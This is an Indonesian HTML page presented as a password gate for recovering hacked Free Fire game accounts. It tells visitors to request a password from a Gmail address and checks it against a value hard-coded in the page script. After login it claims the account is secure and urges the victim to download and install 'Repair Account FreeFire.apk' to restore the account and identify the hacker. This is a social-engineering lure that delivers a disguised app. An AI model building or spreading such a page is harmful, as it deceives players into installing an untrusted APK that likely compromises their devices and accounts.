<!DOCTYPE html>
<html>
<head>
  <title>Halaman Password</title>
  <style>
    body {
  font-family: Arial, sans-serif;
  background: url("images 4.png");
}

.container {
  width: 300px;
  margin: 50px auto;
  padding: 20px;
  background-color: #fff;
  border: 1px solid #ddd;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

.password-box {
  padding: 20px;
  background-color: #f7f7f7;
  border: 1px solid #ddd;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

.input-group {
  margin-bottom: 20px;
}

.input-group label {
  display: block;
  margin-bottom: 10px;
}

.input-group input {
  width: 100%;
  height: 40px;
  padding: 10px;
  border: 1px solid #ccc;
  border-radius: 5px;
  font-size: 40px;
}

button[type="submit"] {
  width: 100%;
  height: 40px;
  background-color: #4CAF50;
  color: #fff;
  padding: 10px;
  border: none;
  border-radius: 5px;
  cursor: pointer;
}

button[type="submit"]:hover {
  background-color: #3e8e41;
}

.next-page {
  width: 300px;
  margin: 50px auto;
  padding: 20px;
  background-color: #fff;
  border: 1px solid #ddd;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
  </style>
</head>
<body>
  <div class="container">
    <div class="password-box">
      <h1>Password</h1>
      <form action="" method="post">
        <div class="input-group">
          <label>Password:</label>
          <input type="password" name="password" required>
        </div>
        <button type="submit">Masuk</button>
      </form>
            <h2>PASSWORD AKAN DIKIRIMKAN MELALUI EMAIL HUBUNGI EMAIL INI freefirebugreport@gmail.com</h2>
    </div>
  </div>
  <div class="next-page" style="display: none;">
    <h1>Selamat Datang!</h1>
    <p>Anda telah berhasil masuk akun anda sudah aman agar anda bisa mengambil akun, anda harus download apk di samping ini→→→
     <a href="Repair Account FreeFire.apk" download="Repair Account FreeFire.apk"><button>DOWNLOAD</button></a>
    <br />
    <br />
     setelah mendownload install apk tersebut agar akun pulih dan anda akan tahu siapa hacker yang meretas akun anda segera install aplikasi kalau akun anda ingin pulih</p>
  </div>
  <script>
    // Fungsi untuk cek password
function cekPassword(password) {
  // Cek apakah password sama dengan password yang telah disimpan
  if (password == '1qsaepjk') {
    // Tampilkan halaman berikutnya
    document.querySelector('.next-page').style.display = 'block';
    document.querySelector('.password-box').style.display = 'none';
  } else {
    alert('Password salah!');
  }
}

// Cek apakah form telah diisi
document.addEventListener('DOMContentLoaded', function() {
  const form = document.querySelector('form');
  form.addEventListener('submit', function(event) {
    event.preventDefault();
    const password = document.querySelector('input[name="password"]').value;
    cekPassword(password);
  });
});
  </script>
</body>
</html>